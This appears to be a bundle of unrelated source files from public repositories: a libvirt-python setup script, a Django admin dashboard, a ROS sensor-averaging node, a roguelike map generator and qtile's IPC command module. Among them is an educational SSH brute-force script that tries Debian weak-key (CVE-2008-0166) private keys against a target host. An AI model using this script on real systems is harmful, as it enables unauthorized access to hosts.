self.run_command('sdist')
self.spawn(["/usr/bin/rpmbuild", "-ta", "--clean",
"dist/libvirt-python-%s.tar.gz" % self.distribution.get_version()])
class my_test(Command):
user_options = [
('build-base=', 'b',
"base directory for build library"),
('build-platlib=', None,
"build directory for platform-specific distributions"),
('plat-name=', 'p',
"platform name to build for, if supported "
"(default: %s)" % get_platform()),
]
description = "Run test suite."
def initialize_options(self):
self.build_base = 'build'
self.build_platlib = None
self.plat_name = None
def finalize_options(self):
if self.plat_name is None:
self.plat_name = get_platform()
plat_specifier = ".%s-%s" % (self.plat_name, sys.version[0:3])
if hasattr(sys, 'gettotalrefcount'):
plat_specifier += '-pydebug'
if self.build_platlib is None:
self.build_platlib = os.path.join(self.build_base,
'lib' + plat_specifier)
def run(self):
"""
Run test suite
"""
apis = get_api_xml_files()
if "PYTHONPATH" in os.environ:
os.environ["PYTHONPATH"] = self.build_platlib + ":" + os.environ["PYTHONPATH"]
else:
os.environ["PYTHONPATH"] = self.build_platlib
self.spawn([sys.executable, "sanitytest.py", self.build_platlib, apis[0]])
self.spawn([sys.executable, "/usr/bin/nosetests"])
class my_clean(clean):
def run(self):
clean.run(self)
if os.path.exists("build"):
remove_tree("build")
##################
# Invoke setup() #
##################
_c_modules, _py_modules = get_module_lists()
setup(name = 'libvirt-python',
version = '1.2.17',
url = 'http://www.libvirt.org',
maintainer = 'Libvirt Maintainers',
maintainer_email = '[email protected]',
description = 'The libvirt virtualization API',
ext_modules = _c_modules,
py_modules = _py_modules,
package_dir = {
'': 'build'
},
cmdclass = {
'build': my_build,
'clean': my_clean,
'sdist': my_sdist,
'rpm': my_rpm,
'test': my_test
},
classifiers = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
]
)
| gpl-2.0 | -9,192,808,951,975,738,000 | 28.513274 | 127 | 0.545527 | false |
mennanov/django-blueprint | project_name/dashboard.py | 1 | 3076 | """
This file was generated with the customdashboard management command and
contains the class for the main dashboard.
To activate your index dashboard add the following to your settings.py::
GRAPPELLI_INDEX_DASHBOARD = '{{ project_name }}.dashboard.CustomIndexDashboard'
"""
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from grappelli.dashboard import modules, Dashboard
from grappelli.dashboard.utils import get_admin_site_name
class CustomIndexDashboard(Dashboard):
"""
Custom index dashboard for www.
"""
def init_with_context(self, context):
site_name = get_admin_site_name(context)
# append a group for "Administration" & "Applications"
self.children.append(modules.Group(
_('Group: Administration & Applications'),
column=1,
collapsible=True,
children=[
modules.AppList(
_('Applications'),
column=1,
css_classes=('collapse closed',),
exclude=('django.contrib.*',),
),
modules.AppList(
_('Administration'),
column=1,
collapsible=False,
models=('django.contrib.*',),
)
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Media Management'),
column=2,
children=[
{
'title': _('FileBrowser'),
'url': '/admin/filebrowser/browse/',
'external': False,
},
]
))
# append another link list module for "support".
self.children.append(modules.LinkList(
_('Support'),
column=2,
children=[
{
'title': _('Django Documentation'),
'url': 'http://docs.djangoproject.com/',
'external': True,
},
{
'title': _('Grappelli Documentation'),
'url': 'http://packages.python.org/django-grappelli/',
'external': True,
},
{
'title': _('Grappelli Google-Code'),
'url': 'http://code.google.com/p/django-grappelli/',
'external': True,
},
]
))
# append a feed module
# self.children.append(modules.Feed(
# _('Latest Django News'),
# column=2,
# feed_url='http://www.djangoproject.com/rss/weblog/',
# limit=5
# ))
# append a recent actions module
self.children.append(modules.RecentActions(
_('Recent Actions'),
limit=20,
collapsible=False,
column=3,
))
| gpl-2.0 | 3,621,246,021,172,486,700 | 30.71134 | 83 | 0.479844 | false |
hivebio/ministat-1 | scripts/avg.py | 1 | 1025 | #!/usr/bin/env python
# license removed for brevity
import rospy
from std_msgs.msg import Float32, Int32
sumdata = 0.0
count = 0
def callback(data):
global count, sumdata
sumdata += data.data
count += 1
def listener():
global count, sumdata
pub = rospy.Publisher('avg', Float32, queue_size=10)
# In ROS, nodes are uniquely named. If two nodes with the same
# node are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('avg')
rate = rospy.Rate(10) # 10hz
rospy.Subscriber("thermistor", Int32, callback)
while not rospy.is_shutdown():
if count >= 20:
pub.publish(Float32(sumdata/count))
count = 0
sumdata = 0
rate.sleep()
# spin() simply keeps python from exiting until this node is stopped
rospy.spin()
if __name__ == '__main__':
listener()
| bsd-2-clause | -5,575,920,084,302,954,000 | 25.973684 | 72 | 0.642927 | false |
abeing/droog | droog/world.py | 1 | 26187 | # -*- coding: UTF-8 -*-
# Droog
# Copyright (C) 2015 Adam Miezianko
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""The Droog module for handling the world.
Location -- A class for value objects storing coordinates in the world.
World -- A class for reference objects of the World itself.
"""
import random
import logging
import math
from . import tile
from . import engine
from . import english
from . import the
LOG = logging.getLogger(__name__)
TREE_CHANCE = 0.05
ROAD_GRID_SIZE = 24
ROAD_CHANCE = 0.5
BUILDING_CHANCE = 0.42
WALL_BREAK_CHANCE = 0.12
mult = [[1, 0, 0, -1, -1, 0, 0, 1],
[0, 1, -1, 0, 0, -1, 1, 0],
[0, 1, 1, 0, 0, -1, -1, 0],
[1, 0, 0, 1, -1, 0, 0, -1]]
class Location(object):
"""The Location class represents a position on a grid."""
def __init__(self, row, col):
"""Construct a new location."""
self.row = row
self.col = col
def offset(self, delta_row, delta_col):
"""Offset the location by a given number of rows and columns."""
return Location(self.row + delta_row, self.col + delta_col)
def distance_to(self, other_loc):
"""Return the distance between another location and this one."""
delta_row = abs(other_loc.row - self.row)
delta_col = abs(other_loc.col - self.col)
return math.sqrt(delta_row * delta_row + delta_col * delta_col)
def delta_to(self, other_loc):
"""Return a delta between the other_loc and this one."""
if other_loc.row == self.row:
delta_row = 0
else:
delta_row = 1 if (other_loc.row - self.row > 0) else -1
if other_loc.col == self.col:
delta_col = 0
else:
delta_col = 1 if (other_loc.col - self.col > 0) else -1
return Location(delta_row, delta_col)
def __repr__(self):
"""Return string representation."""
return "(%r, %r)" % (self.row, self.col)
def __eq__(self, other):
"""Return True if these have the same value."""
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
else:
return False
def __ne__(self, other):
"""Return True if these do not have the same value."""
return not self.__eq__(other)
def random_delta():
"""Return a random delta."""
return Location(random.choice([-1, 0, 1]), random.choice([-1, 0, 1]))
class World(object):
"""Representation of the game world."""
def __init__(self, rows, cols):
"""Creates a World of the specified width, height, number of roads and
probability of intersection continuations.
The world is a grid of streets with the hero in the center.
"""
assert rows > 20
assert cols > 20
self.cols = cols
self.rows = rows
self.tiles = []
self.generator = engine.Generator()
self.generator_location = None
# The junction grid used to make this map, for logging and debugging.
self._junction_grid = None
for row in range(rows):
self.tiles.append(list())
for _ in range(cols):
self.tiles[row].append(tile.make_empty())
self.hero_location = self._position_hero()
self.cell(self.hero_location).creature = the.hero
self._generate()
self.do_fov()
self.visible_monsters = []
self.monster_count = 0
self.dead_monsters = []
def is_empty(self, loc):
"""Returns True if the location is empty."""
return self.cell(loc).transparent
def is_valid_location(self, loc):
"""Return true if this location is in the world bounds."""
return 0 <= loc.row < self.rows and 0 <= loc.col < self.cols
def cell(self, loc):
"""Return the tile at the location."""
return self.tiles[loc.row][loc.col]
def size_in_tiles(self):
"""Return the size of the world in tiles."""
return self.rows * self.cols
def indoor_walkable_locations(self):
"""Return a list of Locations that are indoors."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def outdoor_walkable_locations(self):
"""Return a list of Locations that are outside and walkable."""
results = []
for row in xrange(self.rows):
for col in xrange(self.cols):
loc = Location(row, col)
if not self.cell(loc).indoor and self.cell(loc).walkable:
results.append(loc)
return results
def glyph_at(self, loc):
"""Returns the world glyph and its color at the specified location. If
the location coordinates are out of bounds, returns a shield character.
"""
if loc == self.hero_location:
return '@'
cell = self.cell(loc)
if cell.creature:
return cell.creature.glyph
if cell.items:
return cell.items[0].glyph
return cell.glyph
def description_at(self, loc):
"""Return a description of the location specified.
The description of a map location is description of the first of the
following elements at that location: monster, item, tile.
If the location is invalid, the empty string is returned.
"""
if loc == self.hero_location:
return "yourself"
if self.cell(loc).creature:
return english.indefinite_creature(self.cell(loc).creature)
if self.cell(loc).items:
return self.item_description_at(loc)
else:
return self.cell(loc).description
def item_description_at(self, loc):
"""Return a description of the items at a location."""
items_msg = ""
items = self.cell(loc).items
if items:
items_msg = "%s" % items[0].name
if len(items) > 1:
items_msg += " amongst other things."
else:
items_msg += "."
return items_msg
def move_creature(self, from_loc, delta):
"""Move a creature or hero at (y, x) by (delta_y, delta_x) and return
the action point costs of the movement or zero if the movement was not
possible.
At the moment, only single-step movement is permitted as we do not have
pathfinding implemented."""
assert delta.row < 2
assert delta.col < 2
to_loc = from_loc.offset(delta.row, delta.col)
if self.cell(to_loc).walkable:
moved_creature = self.cell(from_loc).creature
LOG.info('Moved creature %r from %r to %r', moved_creature.name,
from_loc, to_loc)
moved_creature.loc = to_loc
self.cell(from_loc).creature = None
self.cell(to_loc).creature = moved_creature
return engine.movement_cost(delta.row, delta.col)
return 0
def change_hero_loc(self, new_loc):
"""Change the hero location."""
old_loc = self.hero_location
self.hero_location = new_loc
self.cell(old_loc).creature = None
self.cell(new_loc).creature = the.hero
self.do_fov()
def move_hero(self, delta_y, delta_x):
"""Move the hero by (delta_y, delta_x)."""
old_loc = self.hero_location
new_loc = self.hero_location.offset(delta_y, delta_x)
if self.cell(new_loc).walkable:
LOG.info('Moved hero from %r to %r', old_loc, new_loc)
self.change_hero_loc(new_loc)
# If there are items in the new location, report about them in the
# message LOG.
items_msg = self.item_description_at(new_loc)
if items_msg:
the.messages.add("You see here %s" % items_msg)
return engine.movement_cost(delta_y, delta_x)
target = self.cell(new_loc).creature
if target:
return the.hero.melee_attack(target)
# If we have a shield generator, we begin to jurry rig it.
if self.glyph_at(new_loc) == 'G':
return self.generator.deactivate()
return 0
def _position_hero(self):
"""Calculates the location for the hero.
The hero will start in the other ring of the map."""
rand_dist = random.uniform(self.cols / 4, self.cols / 2 - 1)
rand_dir = random.uniform(0, 359)
row = int(rand_dist * math.sin(rand_dir)) + self.rows / 2
col = int(rand_dist * math.cos(rand_dir)) + self.cols / 2
the.hero.loc = Location(row, col)
LOG.debug("Hero starts at %r.", the.hero.loc)
return Location(row, col)
def add_road(self, start_loc, delta_y, delta_x, beta):
"""Adds a road to the map
Starting at (start_y, start_x) and heading in a direction specified by
delta_y and delta_x, draw a map until we reach the edge of the map. If
we run into another road, continue with probability beta, otherwise
stop."""
assert delta_y * delta_x == 0, 'We only support orthogonal roads.'
keep_going = True
road_loc = start_loc
while self.is_valid_location(road_loc) and keep_going:
self.tiles[road_loc.row][road_loc.col] = tile.make_street()
road_loc = road_loc.offset(delta_y, delta_x)
if self.is_valid_location(road_loc) \
and self.cell(road_loc).glyph == '#':
keep_going = random.uniform(0, 1) < beta
def _log(self):
"""Dumps the world into a file called 'world.dump'"""
with open("world.dump", "w") as dump_file:
for row in self._junction_grid:
dump_file.write("%r" % row)
for row in range(self.rows):
for col in range(self.cols):
dump_file.write(self.cell(Location(row, col)).glyph)
dump_file.write("\n")
def random_empty_location(self, near=None, attempts=5, radius=10):
"""Creates a random location on the map, or a random location on the
map near a specified location."""
while attempts > 0:
if near is None:
row = int(random.uniform(0, self.rows))
col = int(random.uniform(0, self.cols))
else:
row = int(random.triangular(low=near.row - radius,
high=near.row + radius))
col = int(random.triangular(low=near.col - radius,
high=near.col + radius))
loc = Location(row, col)
if self.is_valid_location(loc) and \
self.cell(loc).creature is None and self.cell(loc).walkable:
return loc
attempts -= 1
return None
def teleport_hero(self, near):
"""Teleports the hero to a valid location near a specified location."""
new_loc = self.random_empty_location(near)
self.change_hero_loc(new_loc)
def attempt_to_place_monster(self, monster, near=None, hidden=False):
"""Spawns a monster on the map.
The monster should already be created, place_monster only attempts to
find a suitable location on the map and place it. If a suitable
location cannot be found in one attempt, it returns False.
monster - the monster to add to the map
near - a location near which to place the monster, or None if anywhere
in the world is elligible
hidden - whether to exclude locations visible to the hero
"""
assert monster
location = self.random_empty_location(near)
if location is None:
return False
if self.cell(location).seen and hidden:
return False
if monster is not None:
the.turn.add_actor(monster)
monster.loc = location
self.cell(location).creature = monster
LOG.info('%r placed at %r', monster, location)
self.monster_count += 1
return True
def remove_monster(self, monster):
"""Removes a monster from the map, for example when it dies."""
self.visible_monsters.remove(monster)
self.tiles[monster.loc.row][monster.loc.col].creature = None
self.monster_count -= 1
self.dead_monsters.append(monster)
def add_item(self, loc, item):
"""Add an item to a location."""
assert self.is_valid_location(loc)
self.cell(loc).items.append(item)
def get_item(self, loc):
"""Get an item from the world."""
assert self.is_valid_location(loc)
item = None
if self.cell(loc).items:
item = self.cell(loc).items.pop()
return item
def set_lit(self, loc):
"""Set the cell at loc as visible."""
self.cell(loc).seen = True
monster = self.cell(loc).creature
if monster and monster not in self.visible_monsters:
self.visible_monsters.append(monster)
def _cast_light(self, cx, cy, row, start, end, radius, xx, xy, yx, yy):
"Recursive lightcasting function"
if start < end:
return
radius_squared = radius*radius
for j in range(row, radius+1):
dx, dy = -j-1, -j
blocked = False
while dx <= 0:
dx += 1
# Translate the dx, dy coordinates into map coordinates:
X, Y = cx + dx * xx + dy * xy, cy + dx * yx + dy * yy
# l_slope and r_slope store the slopes of the left and right
# extremities of the square we're considering:
l_slope, r_slope = (dx-0.5)/(dy+0.5), (dx+0.5)/(dy-0.5)
loc = Location(Y, X)
if not self.is_valid_location(loc):
return
if start < r_slope:
continue
elif end > l_slope:
break
else:
# Our light beam is touching this square; light it:
if dx*dx + dy*dy < radius_squared:
self.set_lit(loc)
if blocked:
# we're scanning a row of blocked squares:
if not self.is_empty(loc):
new_start = r_slope
continue
else:
blocked = False
start = new_start
else:
if not self.is_empty(loc) and j < radius:
# This is a blocking square, start a child scan:
blocked = True
self._cast_light(cx, cy, j+1, start, l_slope,
radius, xx, xy, yx, yy)
new_start = r_slope
# Row is scanned; do next row unless last square was blocked:
if blocked:
break
def reset_fov(self):
"""Reset the field of view data for the map."""
for row in xrange(self.rows):
for col in xrange(self.cols):
self.tiles[row][col].seen = False
self.visible_monsters = []
def do_fov(self):
"Calculate lit squares from the given location and radius"
self.reset_fov()
for octant in range(8):
self._cast_light(self.hero_location.col, self.hero_location.row,
1, 1.0, 0.0, 10,
mult[0][octant], mult[1][octant],
mult[2][octant], mult[3][octant])
def _generate(self):
"""Generate the world map.
This function builds the world in several stages.
1) Generate grasses, bushes and trees.
2) Generate the road grid.
3) Build the fortress.
4) Build the other buildings and a lake.
"""
self._generate_vegetation()
self._generate_roads()
self._generate_computer()
self._generate_shield()
self._generate_buildings()
def _generate_vegetation(self):
"""Fill the map with vegeation."""
for row in xrange(0, self.rows):
for col in xrange(0, self.cols):
if TREE_CHANCE > random.random():
self.tiles[row][col] = tile.make_tree()
else:
self.tiles[row][col] = tile.make_empty()
def _generate_roads(self):
"""Fill the map with a grid of roads."""
junction_grid = _create_junction_grid(self.rows, self.cols,
ROAD_GRID_SIZE)
self._junction_grid = junction_grid # for dumping purposes
prev_road_row = 0
road_row = ROAD_GRID_SIZE
prev_road_col = 0
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
LOG.debug("Drawing junction %r", junction)
if junction[0]: # North road
LOG.debug("Drawing north road from row %d to row %d in "
"col %d", prev_road_row, road_row, road_col)
extended_prev_road_row = prev_road_row - 3
if extended_prev_road_row < 0:
extended_prev_road_row = 0
for row in xrange(extended_prev_road_row, road_row):
if self.tiles[row][road_col - 5].glyph != '*':
self.tiles[row][road_col - 5] = tile.make_empty()
if self.tiles[row][road_col - 4].glyph != '*':
self.tiles[row][road_col - 4] = tile.make_empty()
self.tiles[row][road_col - 3] = tile.make_street()
self.tiles[row][road_col - 2] = tile.make_street()
self.tiles[row][road_col - 1] = tile.make_street()
if road_col < self.cols - 1 \
and self.tiles[row][road_col].glyph != '*':
self.tiles[row][road_col + 0] = tile.make_empty()
if road_col < self.cols - 2 \
and self.tiles[row][road_col + 1].glyph != '*':
self.tiles[row][road_col + 1] = tile.make_empty()
if junction[3]: # West road
LOG.debug("Drawing west road from col %d to col %d in "
"row %d", prev_road_col, road_col, road_row)
for col in xrange(prev_road_col, road_col):
if self.tiles[road_row - 5][col].glyph != '*':
self.tiles[road_row - 5][col] = tile.make_empty()
if self.tiles[road_row - 4][col].glyph != '*':
self.tiles[road_row - 4][col] = tile.make_empty()
self.tiles[road_row - 3][col] = tile.make_street()
self.tiles[road_row - 2][col] = tile.make_street()
self.tiles[road_row - 1][col] = tile.make_street()
if road_row < self.rows - 1 \
and self.tiles[road_row][col].glyph != '*':
self.tiles[road_row][col] = tile.make_empty()
if road_row < self.rows - 2 \
and self.tiles[road_row + 1][col].glyph != '*':
self.tiles[road_row + 1][col] = tile.make_empty()
prev_road_col = road_col
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
prev_road_row = road_row
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
prev_road_col = 0
road_col = ROAD_GRID_SIZE
road_row = ROAD_GRID_SIZE
road_col = ROAD_GRID_SIZE
for junction_row in junction_grid:
for junction in junction_row:
if not junction[0] and not junction[3]:
self.tiles[road_row - 3][road_col - 3] = tile.make_empty()
if not junction[2] and not junction[3]:
self.tiles[road_row - 1][road_col - 3] = tile.make_empty()
if not junction[1] and not junction[2]:
self.tiles[road_row - 1][road_col - 1] = tile.make_empty()
if not junction[0] and not junction[1]:
self.tiles[road_row - 3][road_col - 1] = tile.make_empty()
road_col += ROAD_GRID_SIZE
if road_col >= self.cols:
road_col = self.cols
road_col = ROAD_GRID_SIZE
road_row += ROAD_GRID_SIZE
if road_row >= self.rows:
road_row = self.rows
def _generate_computer(self):
"""Places a shield generator in the center of the map."""
row = self.rows / 2
col = self.cols / 2
self.generator_location = Location(row, col)
self.tiles[row][col] = tile.make_shield_generator()
def _generate_shield(self):
"""Creates the shield border around the navigable map."""
for row in range(0, self.rows):
self.tiles[row][0] = tile.make_shield()
self.tiles[row][self.cols - 1] = tile.make_shield()
for col in range(self.cols):
self.tiles[0][col] = tile.make_shield()
self.tiles[self.rows - 1][col] = tile.make_shield()
def _generate_buildings(self):
"""Create buildings in some blocks."""
cell_begin_row = 0
cell_end_row = ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
while cell_end_row < self.rows:
while cell_end_col < self.cols:
if random.random() < BUILDING_CHANCE:
begin = Location(cell_begin_row, cell_begin_col)
end = Location(cell_end_row, cell_end_col)
self._generate_building(begin, end)
cell_begin_col = cell_end_col
cell_end_col += ROAD_GRID_SIZE
cell_begin_row = cell_end_row
cell_end_row += ROAD_GRID_SIZE
cell_begin_col = 0
cell_end_col = ROAD_GRID_SIZE
def _generate_building(self, begin, end):
"""Create a building at the sepcified site."""
LOG.debug("Generating a building between %r and %r.", begin, end)
top = begin.row + random.randint(3, ROAD_GRID_SIZE / 3)
bottom = end.row - random.randint(6, ROAD_GRID_SIZE / 3)
left = begin.col + random.randint(3, ROAD_GRID_SIZE / 3)
right = end.col - random.randint(6, ROAD_GRID_SIZE / 3)
for row in xrange(top, bottom + 1):
for col in xrange(left, right + 1):
if row == top or row == bottom or col == left or col == right:
if WALL_BREAK_CHANCE < random.random():
self.tiles[row][col] = tile.make_wall()
else:
self.tiles[row][col] = tile.make_floor()
def _generate_random_junction(north, south, east, west):
"""Generate random junction given which roads much or must not exist.
For north, south, east, and west True means road must exist, False means
road must not exist, and None means either is okay.
"""
result = [north, south, east, west]
free_roads = []
for index in xrange(4):
if result[index] is None:
free_roads.append(index)
free_road_count = len(free_roads)
fill_road_count = 0
for _ in xrange(free_road_count):
fill_road_count += random.random() < ROAD_CHANCE
while fill_road_count > 0:
fill_road = random.choice(free_roads)
result[fill_road] = True
free_roads.remove(fill_road)
fill_road_count -= 1
road_count = 0
for road in result:
if road is True:
road_count += 1
if road_count == 1:
fill_road = random.choice(free_roads)
free_roads.remove(fill_road)
result[fill_road] = True
while free_roads:
fill_road = free_roads.pop()
result[fill_road] = False
return result
def _log_junction_grid(grid):
"""Writes the junction grid out to the log."""
LOG.debug("Junction grid")
for row in grid:
LOG.debug(row)
def _create_junction_grid(map_rows, map_cols, cell_size):
"""Create a grid of valid road intersations."""
assert cell_size < map_rows
assert cell_size < map_cols
junction_grid = []
rows = map_rows / cell_size
cols = map_cols / cell_size
LOG.debug("Creating junction grid of size %d rows by %d columns. cell"
" size is %d", rows, cols, cell_size)
for row in xrange(0, rows):
junction_grid.append([])
for col in xrange(0, cols):
north = junction_grid[row - 1][col][2] if row > 0 else None
west = junction_grid[row][col - 1][1] if col > 0 else None
junction = _generate_random_junction(north, None, None, west)
junction_grid[row].append(junction)
return junction_grid
| gpl-2.0 | 4,446,171,767,116,297,000 | 39.041284 | 79 | 0.543743 | false |
QuintilianoB/Violent-Python-examples | Chapter 2/5.debianSshWeakPK.py | 1 | 3380 | # SSH brute force with pxssh class and keyfile, based on chapter 2
# Python 3.4
"""
Another example of this script: https://www.exploit-db.com/exploits/5720/
The 32768 keys can be found here: https://github.com/g0tmi1k/debian-ssh
The exploit CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0166
For this works, you must have a Debian distro with an vulnerable version of Openssl.
I've tested it with version 0.9.8g
Download links:
1 Ubuntu pkg- https://launchpad.net/ubuntu/+source/openssl/0.9.8b-2ubuntu2.1
2 Source - https://www.openssl.org/source/old/0.9.x/openssl-0.9.8b.tar.gz
"""
import pexpect
import argparse
import os
import threading
maxConnections = 5
connection_lock = threading.BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
# Defines what pexpect should expect as return.
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you want to continue'
conn_closed = 'Connection closed by remote host'
# SSH connection with keyfile instead of password. If no keyfile is sent, there will be no connection.
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh ' + user + '@' + host + ' -i' + keyfile + opt
# Starts a connections and reads the return.
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied,ssh_newkey, conn_closed, '$', '#'])
if ret == 2:
print("[-] Adding host to know_host file")
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print("[-] {0}.".format(conn_closed))
Fails += 1
elif ret > 3:
print("[+] Success. {0}".format(str(keyfile)))
Stop = True
finally:
# After succeed on trying connection, releases the lock from resource.
if release:
connection_lock.release()
def main():
# Defines the options and the help menu.
parser = argparse.ArgumentParser(description="Simple Python SSH Brute Force with keyfile")
parser.add_argument('Target', help="Target host.")
parser.add_argument('User', help="User for ssh connection.")
parser.add_argument('KeyDir', help="Directory with private keyfiles for connection.")
# Receives the arguments sent by the user.
args = parser.parse_args()
tgtHost = args.Target
user = args.User
keyDir = args.KeyDir
# If anything is not set , prints the help menu from argparse and exits.
if tgtHost == None or user == None or keyDir == None:
print(parser.usage)
exit(0)
for keyfile in os.listdir(keyDir):
if Stop:
print("[*] Key found. Exiting.")
exit(0)
if Fails > 5:
print("[!] Too many connection errors. Exiting.")
exit(0)
connection_lock.acquire()
# Receives the keyfile's location and joins it with the file name for a complete path.
fullpath = os.path.join(keyDir, keyfile)
print("[-] Testing key: {0}".format(str(fullpath)))
# Defines and starts the thread.
bruteforce = threading.Thread(target=connect, args=(user, host, fullpath, True))
child = bruteforce.start()
if __name__ == '__main__':
main() | gpl-2.0 | -930,355,457,819,945,000 | 30.598131 | 110 | 0.633728 | false |
Fxrh/tispa-wm | libqtile/command.py | 1 | 12105 | # Copyright (c) 2008, Aldo Cortesi. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import inspect
import traceback
import textwrap
import os
import ipc
class CommandError(Exception):
pass
class CommandException(Exception):
pass
class _SelectError(Exception):
def __init__(self, name, sel):
Exception.__init__(self)
self.name, self.sel = name, sel
SUCCESS = 0
ERROR = 1
EXCEPTION = 2
SOCKBASE = "qtilesocket.%s"
def formatSelector(lst):
"""
Takes a list of (name, sel) tuples, and returns a formatted
selector expression.
"""
expr = []
for i in lst:
if expr:
expr.append(".")
expr.append(i[0])
if i[1] is not None:
expr.append("[%s]" % repr(i[1]))
return "".join(expr)
class _Server(ipc.Server):
def __init__(self, fname, qtile, conf):
if os.path.exists(fname):
os.unlink(fname)
ipc.Server.__init__(self, fname, self.call)
self.qtile = qtile
self.widgets = {}
for i in conf.screens:
for j in i.gaps:
if hasattr(j, "widgets"):
for w in j.widgets:
if w.name:
self.widgets[w.name] = w
def call(self, data):
selectors, name, args, kwargs = data
try:
obj = self.qtile.select(selectors)
except _SelectError, v:
e = formatSelector([(v.name, v.sel)])
s = formatSelector(selectors)
return ERROR, "No object %s in path '%s'" % (e, s)
cmd = obj.command(name)
if not cmd:
return ERROR, "No such command."
self.qtile.log.info("Command: %s(%s, %s)" % (name, args, kwargs))
try:
return SUCCESS, cmd(*args, **kwargs)
except CommandError, v:
return ERROR, v.args[0]
except Exception, v:
return EXCEPTION, traceback.format_exc()
self.qtile.conn.flush()
class _Command:
def __init__(self, call, selectors, name):
"""
:command A string command name specification
:*args Arguments to be passed to the specified command
:*kwargs Arguments to be passed to the specified command
"""
self.selectors, self.name = selectors, name
self.call = call
def __call__(self, *args, **kwargs):
return self.call(self.selectors, self.name, *args, **kwargs)
class _CommandTree(object):
"""
A CommandTree a hierarchical collection of command objects.
CommandTree objects act as containers, allowing them to be nested. The
commands themselves appear on the object as callable attributes.
"""
def __init__(self, call, selectors, myselector, parent):
self.call = call
self.selectors = selectors
self.myselector = myselector
self.parent = parent
@property
def path(self):
s = self.selectors[:]
if self.name:
s += [(self.name, self.myselector)]
return formatSelector(s)
def __getitem__(self, select):
if self.myselector:
raise KeyError("No such key: %s" % select)
c = self.__class__(self.call, self.selectors, select, self)
return c
def __getattr__(self, name):
nextSelector = self.selectors[:]
if self.name:
nextSelector.append((self.name, self.myselector))
if name in self._contains:
return _TreeMap[name](self.call, nextSelector, None, self)
else:
return _Command(self.call, nextSelector, name)
class _TLayout(_CommandTree):
name = "layout"
_contains = ["group", "window", "screen"]
class _TWidget(_CommandTree):
name = "widget"
_contains = ["bar", "screen", "group"]
class _TBar(_CommandTree):
name = "bar"
_contains = ["screen"]
class _TWindow(_CommandTree):
name = "window"
_contains = ["group", "screen", "layout"]
class _TScreen(_CommandTree):
name = "screen"
_contains = ["layout", "window", "bar"]
class _TGroup(_CommandTree):
name = "group"
_contains = ["layout", "window", "screen"]
_TreeMap = {
"layout": _TLayout,
"widget": _TWidget,
"bar": _TBar,
"window": _TWindow,
"screen": _TScreen,
"group": _TGroup,
}
class _CommandRoot(_CommandTree):
name = None
_contains = ["layout", "widget", "screen", "bar", "window", "group"]
def __init__(self):
"""
This method constructs the entire hierarchy of callable commands
from a conf object.
"""
_CommandTree.__init__(self, self.call, [], None, None)
def __getitem__(self, select):
raise KeyError("No such key: %s" % select)
def call(self, selectors, name, *args, **kwargs):
"""
This method is called for issued commands.
:selectors A list of (name, selector) tuples.
:name Command name.
"""
pass
def find_sockfile(display=None):
"""
Finds the appropriate socket file.
"""
if not display:
display = os.environ.get("DISPLAY")
if not display:
display = ":0.0"
if '.' not in display:
display += '.0'
cache_directory = os.path.expandvars('$XDG_CACHE_HOME')
if cache_directory == '$XDG_CACHE_HOME':
# if variable wasn't set
cache_directory = os.path.expanduser("~/.cache")
if not os.path.exists(cache_directory):
os.makedirs(cache_directory)
return os.path.join(cache_directory, SOCKBASE % display)
class Client(_CommandRoot):
"""
Exposes a command tree used to communicate with a running instance of
Qtile.
"""
def __init__(self, fname=None):
if not fname:
fname = find_sockfile()
self.client = ipc.Client(fname)
_CommandRoot.__init__(self)
def call(self, selectors, name, *args, **kwargs):
state, val = self.client.call((selectors, name, args, kwargs))
if state == SUCCESS:
return val
elif state == ERROR:
raise CommandError(val)
else:
raise CommandException(val)
class CommandRoot(_CommandRoot):
